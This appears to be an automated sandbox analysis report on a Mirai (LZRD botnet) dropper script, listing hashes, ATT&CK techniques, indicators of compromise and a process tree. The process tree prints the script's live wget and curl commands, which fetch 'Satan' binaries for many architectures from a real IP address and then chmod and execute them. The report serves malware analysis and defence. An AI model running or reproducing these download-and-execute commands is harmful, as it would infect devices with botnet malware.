mirai | 9728623b44f5e32acfd770915d4d1b244997a757b4bdf01e5259bcdf9918784b

Analysis

max time kernel
139s
max time network
152s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
20-11-2024 22:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

f9c8b9116a6544ef8d58828792753e7c
SHA1

5c6d5022d286ea418696cb67741df180e5cfc9b4
SHA256

9728623b44f5e32acfd770915d4d1b244997a757b4bdf01e5259bcdf9918784b
SHA512

e4c10931ad880f64cd284648287324beb72b76adfbfc55e90abac1c868c00d4209be1b98c3c50fd7c9b1a572a67feefadf74f5c817126a922001ce1f44e7f43e

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	Process
1571	chmod
1643	chmod
1663	chmod
1673	chmod
1541	chmod
1581	chmod
1603	chmod
1613	chmod
1653	chmod
1551	chmod
1561	chmod
1623	chmod
1633	chmod
1535	chmod
1591	chmod

Executes dropped EXE 15 IoCs

Processes:

SatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatan

ioc	pid	Process
/tmp/Satan	1536	Satan
/tmp/Satan	1542	Satan
/tmp/Satan	1552	Satan
/tmp/Satan	1562	Satan
/tmp/Satan	1572	Satan
/tmp/Satan	1582	Satan
/tmp/Satan	1592	Satan
/tmp/Satan	1604	Satan
/tmp/Satan	1614	Satan
/tmp/Satan	1624	Satan
/tmp/Satan	1634	Satan
/tmp/Satan	1644	Satan
/tmp/Satan	1654	Satan
/tmp/Satan	1664	Satan
/tmp/Satan	1674	Satan

Modifies Watchdog functionality 1 TTPs 28 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

Processes:

SatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatan

description	ioc	Process
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/watchdog	Satan

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 28 IoCs

Processes:

SatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatan

description	ioc	Process
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/fstream-5.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

SatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatan

description	ioc	Process
File opened for reading	/proc/691/status	Satan
File opened for reading	/proc/1142/status	Satan
File opened for reading	/proc/82/status	Satan
File opened for reading	/proc/12/status	Satan
File opened for reading	/proc/5/status	Satan
File opened for reading	/proc/1363/status	Satan
File opened for reading	/proc/160/status	Satan
File opened for reading	/proc/1526/status	Satan
File opened for reading	/proc/32/status	Satan
File opened for reading	/proc/1142/status	Satan
File opened for reading	/proc/558/status	Satan
File opened for reading	/proc/243/status	Satan
File opened for reading	/proc/471/status	Satan
File opened for reading	/proc/2/status	Satan
File opened for reading	/proc/1200/status	Satan
File opened for reading	/proc/1325/status	Satan
File opened for reading	/proc/164/status	Satan
File opened for reading	/proc/533/status	Satan
File opened for reading	/proc/1201/status	Satan
File opened for reading	/proc/164/status	Satan
File opened for reading	/proc/1081/status	Satan
File opened for reading	/proc/32/status	Satan
File opened for reading	/proc/171/status	Satan
File opened for reading	/proc/956/status	Satan
File opened for reading	/proc/1166/status	Satan
File opened for reading	/proc/547/status	Satan
File opened for reading	/proc/17/status	Satan
File opened for reading	/proc/85/status	Satan
File opened for reading	/proc/176/status	Satan
File opened for reading	/proc/21/status	Satan
File opened for reading	/proc/317/status	Satan
File opened for reading	/proc/1169/status	Satan
File opened for reading	/proc/78/status	Satan
File opened for reading	/proc/13/status	Satan
File opened for reading	/proc/547/status	Satan
File opened for reading	/proc/78/status	Satan
File opened for reading	/proc/669/status	Satan
File opened for reading	/proc/1120/status	Satan
File opened for reading	/proc/1054/status	Satan
File opened for reading	/proc/173/status	Satan
File opened for reading	/proc/1084/status	Satan
File opened for reading	/proc/1657/status	Satan
File opened for reading	/proc/454/status	Satan
File opened for reading	/proc/1120/status	Satan
File opened for reading	/proc/1258/status	Satan
File opened for reading	/proc/24/status	Satan
File opened for reading	/proc/89/status	Satan
File opened for reading	/proc/739/status	Satan
File opened for reading	/proc/1160/status	Satan
File opened for reading	/proc/178/status	Satan
File opened for reading	/proc/6/status	Satan
File opened for reading	/proc/1097/status	Satan
File opened for reading	/proc/89/status	Satan
File opened for reading	/proc/9/status	Satan
File opened for reading	/proc/1286/status	Satan
File opened for reading	/proc/1577/status	Satan
File opened for reading	/proc/1524/status	Satan
File opened for reading	/proc/1267/status	Satan
File opened for reading	/proc/1659/status	Satan
File opened for reading	/proc/176/status	Satan
File opened for reading	/proc/619/status	Satan
File opened for reading	/proc/137/status	Satan
File opened for reading	/proc/1238/status	Satan
File opened for reading	/proc/1619/status	Satan

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

wgetcurlwgetcurl

pid	Process
1568	wget
1569	curl
1578	wget
1579	curl

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlcpcurlwgetcurlcurlcurlcurlcurlcurlwgetcurlwgetcurlcurlwgetwgetwgetwgetwgetwgetohshit.shcurlwgetcurlcurlcurlwgetwget

description	ioc	Process
File opened for modification	/tmp/Satan.ppc	wget
File opened for modification	/tmp/Satan.sparc	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/Satan.mpsl	curl
File opened for modification	/tmp/Satan.x86	wget
File opened for modification	/tmp/Satan.mips64	curl
File opened for modification	/tmp/Satan.arm	curl
File opened for modification	/tmp/Satan.arm5	curl
File opened for modification	/tmp/Satan.i686	curl
File opened for modification	/tmp/Satan.m68k	curl
File opened for modification	/tmp/Satan.sh4	curl
File opened for modification	/tmp/Satan.arm5	wget
File opened for modification	/tmp/Satan.ppc	curl
File opened for modification	/tmp/Satan.arm6	wget
File opened for modification	/tmp/Satan.arc	curl
File opened for modification	/tmp/Satan.x86	curl
File opened for modification	/tmp/Satan.arm7	wget
File opened for modification	/tmp/Satan.arc	wget
File opened for modification	/tmp/Satan.mips	wget
File opened for modification	/tmp/Satan.mpsl	wget
File opened for modification	/tmp/Satan.arm	wget
File opened for modification	/tmp/Satan.m68k	wget
File opened for modification	/tmp/Satan	ohshit.sh
File opened for modification	/tmp/Satan.x86_64	curl
File opened for modification	/tmp/Satan.i686	wget
File opened for modification	/tmp/Satan.mips	curl
File opened for modification	/tmp/Satan.arm6	curl
File opened for modification	/tmp/Satan.arm7	curl
File opened for modification	/tmp/Satan.sh4	wget
File opened for modification	/tmp/Satan.x86_64	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:1526
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:1527
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.arc
  2⤵
  - Writes file to tmp directory
  PID:1528
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.arc
  2⤵
  - Writes file to tmp directory
  PID:1533
- /bin/cat
  cat Satan.arc
  2⤵
  PID:1534
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-ujVZP0
  2⤵
  - File and Directory Permissions Modification
  PID:1535
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:1536
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.x86
  2⤵
  - Writes file to tmp directory
  PID:1538
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.x86
  2⤵
  - Writes file to tmp directory
  PID:1539
- /bin/cat
  cat Satan.x86
  2⤵
  PID:1540
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.x86 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-ujVZP0
  2⤵
  - File and Directory Permissions Modification
  PID:1541
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1542
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1548
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1549
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-ujVZP0
  2⤵
  - File and Directory Permissions Modification
  PID:1551
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1552
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.i686
  2⤵
  - Writes file to tmp directory
  PID:1558
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.i686
  2⤵
  - Writes file to tmp directory
  PID:1559
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.i686 Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-ujVZP0
  2⤵
  - File and Directory Permissions Modification
  PID:1561
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1562
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1568
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1569
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.i686 Satan.mips Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-ujVZP0
  2⤵
  - File and Directory Permissions Modification
  PID:1571
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1572
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.mips64
  2⤵
  - System Network Configuration Discovery
  PID:1578
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.mips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1579
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.i686 Satan.mips Satan.mips64 Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-ujVZP0
  2⤵
  - File and Directory Permissions Modification
  PID:1581
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1582
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1588
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1589
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-ujVZP0
  2⤵
  - File and Directory Permissions Modification
  PID:1591
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1592
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.arm
  2⤵
  - Writes file to tmp directory
  PID:1600
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.arm
  2⤵
  - Writes file to tmp directory
  PID:1601
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.arm Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
  2⤵
  - File and Directory Permissions Modification
  PID:1603
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1604
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.arm5
  2⤵
  - Writes file to tmp directory
  PID:1610
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.arm5
  2⤵
  - Writes file to tmp directory
  PID:1611
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
  2⤵
  - File and Directory Permissions Modification
  PID:1613
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1614
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.arm6
  2⤵
  - Writes file to tmp directory
  PID:1620
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.arm6
  2⤵
  - Writes file to tmp directory
  PID:1621
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
  2⤵
  - File and Directory Permissions Modification
  PID:1623
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1624
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.arm7
  2⤵
  - Writes file to tmp directory
  PID:1630
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.arm7
  2⤵
  - Writes file to tmp directory
  PID:1631
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
  2⤵
  - File and Directory Permissions Modification
  PID:1633
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1634
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.ppc
  2⤵
  - Writes file to tmp directory
  PID:1640
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.ppc
  2⤵
  - Writes file to tmp directory
  PID:1641
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
  2⤵
  - File and Directory Permissions Modification
  PID:1643
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1644
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.sparc
  2⤵
  PID:1650
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.sparc
  2⤵
  - Writes file to tmp directory
  PID:1651
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.sparc Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
  2⤵
  - File and Directory Permissions Modification
  PID:1653
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1654
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.m68k
  2⤵
  - Writes file to tmp directory
  PID:1660
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.m68k
  2⤵
  - Writes file to tmp directory
  PID:1661
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.m68k Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.sparc Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
  2⤵
  - File and Directory Permissions Modification
  PID:1663
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1664
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.sh4
  2⤵
  - Writes file to tmp directory
  PID:1670
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.sh4
  2⤵
  - Writes file to tmp directory
  PID:1671
- /bin/chmod
  chmod +x busybox config-err-GvQjsb netplan_dhxygxhm ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.m68k Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.sh4 Satan.sparc Satan.x86 Satan.x86_64 snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9
  2⤵
  - File and Directory Permissions Modification
  PID:1673
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1674

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Satan

Filesize
37KB

MD5
edf612986dba9abff11a7530fa06d3c2

SHA1
c39e5ecf48ed660df4c93353744955bebfb91636

SHA256
d7800781555066e97a3165a99ca416c452f0d60d9160fdcc62e842311c8664f0

SHA512
0dd292e9760c9ac15b06809133d8296f21250085c803585be73abcd1d1faacbf07bb28a0703943f65c0bc66e0c6311b3342a1c39e118dfae6491b5f7b7eeda9f

Download Submit
/tmp/Satan.arc

Filesize
113KB

MD5
9de12c22a69d095a6338587f24e647d6

SHA1
ebfed805c282dad0b14dff439244389eba88e1f3

SHA256
74843b368ce9364f2e19a07dcd1f51e7a066da82dfdbddd71a0329fd1b13850a

SHA512
bcc5ea5ab6596a9dc8cf5a68c43e33b5a1535eef962a46f0a61ecdc78b8df42b1eac717d7e2fb398b8b88150499057c4cedbda1d3c2de664d5523f117e834c1f

Download Submit
/tmp/busybox

Filesize
2.0MB

MD5
b4dede5fc0b1bad5cb8e901bde126b97

SHA1
10cbe9a418ad84a1ed297948539d37aeb58dd810

SHA256
a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

SHA512
45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

Download Submit
memory/1542-1-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1552-2-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1562-3-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1572-4-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1582-5-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1592-6-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1604-7-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1614-8-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1624-9-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1634-10-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1644-11-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1654-12-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1664-13-0x0000000008048000-0x000000000805bc08-memory.dmp

Download
memory/1674-14-0x0000000008048000-0x000000000805bc08-memory.dmp

Download